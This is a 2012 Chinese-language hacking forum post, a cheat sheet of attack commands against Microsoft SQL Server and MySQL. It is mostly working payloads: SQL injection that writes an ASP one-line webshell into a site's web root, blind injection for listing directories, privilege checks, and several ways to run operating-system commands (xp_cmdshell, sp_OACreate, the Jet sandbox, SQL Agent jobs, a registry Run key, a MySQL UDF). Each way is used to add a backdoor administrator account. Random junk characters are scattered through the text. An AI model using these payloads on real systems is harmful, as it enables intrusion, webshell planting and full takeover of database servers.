找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3015|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马
$ s' I2 v! r0 H7 Y首先确定网站的WEB路径" ?6 D1 G' K, n) i" I6 Y
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马) F9 R" A% }  c- H+ d

$ e' J# L  Y2 b$ o, Z;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 1 ]+ M/ c& c# m& A; ?+ I
//将一句话木马插入表中
; r$ M  \2 I# C- h2 V1 r& o& x' Z! u3 ?4 C2 }
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- : j6 G; m$ l3 U; N" f: p2 j8 [
//导出一个ASP文件
) f$ F) R5 v% S* [' T( Y( {! F& P( k0 E
5 r3 u3 ~( B# v
关于MSSQL列目录
  z/ U; F4 |- T1 t;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
( i! q9 `% n2 m4 q) \Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表/ r0 P$ q0 E. h! s

( m0 A9 Y' T  v) n2 Wand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
4 n! U! L. f6 |6 [8 p) x8 ]) f% I% p
" p3 f2 Y5 E! r7 Y( J) f5 s" hAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段2 C4 R4 D- W" P6 c
4 j) c9 I  h" X* C1 @$ A
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符  ~9 `2 K  i' t2 D
2 A) x1 z$ O8 Q' l( l* |& x. @
4 _# f6 ~7 W  n7 v5 R2 m2 T
数据库版本和权限查看
& V# x$ L% w3 h/ y# rand 1=(select @@VERSION) //查看详细的数据库信息.! ~0 L. ?& e4 p, M
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA9 ~% z+ ?+ j% n' }$ Z/ ~
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
' t- z+ c* G; y" |" E7 H/ A5 z) d" a. k5 @4 y" _* H4 _
8 }( N; p6 O' [) @: w5 T; l% N- x
1.利用xp_cmdshell执行命令
% l; F' y3 o$ [6 B5 N# Iexec master..xp_cmdshell 'net user rfire 123456 /add'$ {/ F  M1 L( k& u. p3 x
exec master..xp_cmdshell 'net localgroup administrators rfire /add'( T, f0 g( D3 _, c! s; e

' j& ^" c8 [3 {8 o* k* n恢复xp_cmdshell存储过程+ h# s$ T% c  o; r+ ]& B
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll': m0 c" p  V, x. _
! H  M% p8 F5 E4 ~6 y. m: E6 f
' j3 O+ K7 M+ w4 j7 M7 |6 _" l
2.利用SP_OAcreate和SP_OAMETHOD执行命令! ?5 z! i0 X8 F- ]* @
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下" p& [2 m' Z7 a; X! b0 [
DECLARE @shell INT //建立一个@shell实体. \* c. z$ |$ w, x+ K( @0 F
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例$ R! a9 c3 m, [. c! s. u% R; B
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
+ j1 D9 l; t9 N) r  x. s$ R% P% K

- L! G; q- s, Q. H9 ~, M* u, B3.利用沙盒模式1 Q1 v+ f) C' z
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
0 Q* ^9 x* ~1 K开启沙盒模式:. F4 V# W/ x7 X! U& I
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',06 E8 G2 O  R) r5 T% A8 v$ }

% G+ c/ u5 A  N* y$ W/ |执行命令:; U$ J8 x* W- m0 j
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
3 g7 h+ r3 L5 k3 w6 e- h; V; t; W* v& h9 q9 v& g0 j
, ~+ r# k- [" ]/ i- k; k% i
4.利用SQL代理执行命令% ~. q' A3 N1 [1 Z  V
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
$ h* x; X5 F* o2 m1 ~1 a
% w+ R( Q  G% A, _  M" v执行命令:. P  S. ?& ~5 j; ]) z) d# p% B
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错3 v2 B, E' I6 [! J( x
exec sp_add_job 'x'4 b, ^* F) B7 P! k$ W. I* O
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
6 ?2 T3 h, c- @7 X7 z9 q8 H( jexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
* S5 d" u- m6 W5 F5 D$ h1 }6 _. E4 I; Y- A& g" n

% x9 N7 U9 E8 r+ W5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)0 b/ G4 ?% c6 e# a3 r1 I5 I. X
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
# a, S' Y7 J; M: \( Q2 T7 d( P7 T, ~: {/ d. Q4 I* j
7 g/ J: G9 v* ]6 y; ~. i, p7 i
6.MYSQL的命令执行
9 E" M1 O) V& k$ a" `7 M5 M  M" }MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
! A9 G' E# v. V$ J* ~8 q首先要在su.php下导出c:\windows\udf.dll
! Y, \0 g8 j# S9 d导出后执行创建自定义函数命令:
3 A, v$ D5 `! o, ~9 Y. wCreate Function cmdshell returns string soname 'udf.dll'9 c9 e9 t4 @& ?* X
执行命令* V3 A- I$ L6 A
select cmdshell('net user rfire 123456 /add')
- D1 g: a' e4 p% s3 T执行后删除函数 drop function cmdshell
" Y3 @, o0 [" v7 N  A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表